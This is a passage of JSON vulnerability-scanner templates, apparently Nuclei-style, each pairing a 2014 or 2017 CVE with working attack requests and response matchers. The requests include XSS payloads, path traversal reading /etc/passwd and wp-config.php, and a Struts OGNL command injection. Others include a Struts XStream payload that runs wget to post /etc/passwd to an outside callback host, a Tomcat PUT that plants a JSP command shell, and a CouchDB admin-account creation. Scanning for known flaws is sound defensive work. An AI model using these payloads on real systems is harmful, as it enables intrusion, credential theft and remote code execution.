Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Video Gallery WordPress DZS"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/swipehq-payment-gateway-woocommerce/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4941","info":{"name":"Cross RSS 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/cross-rss/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18518","info":{"name":"SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"SMTP by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18505","info":{"name":"BestWebSoft's Twitter < 2.55 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Twitter Button by\")"],"condition":"and"}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18493","info":{"name":"Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Admin Page by\")"],"condition":"and"}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18496","info":{"name":"Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Htaccess by\")"],"condition":"and"}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["JBoss","ClassCastException"],"condition":"and","case-insensitive":true},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Amty Thumb","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18556","info":{"name":"Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Analytics by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18501","info":{"name":"Social Login by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Login by\")"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-18494","info":{"name":"Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Search by\")"],"condition":"and"}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18490","info":{"name":"Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form Multi by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18529","info":{"name":"PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PromoBar by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-18527","info":{"name":"Pagination by BestWebSoft < 1.0.7 - Cross-Site 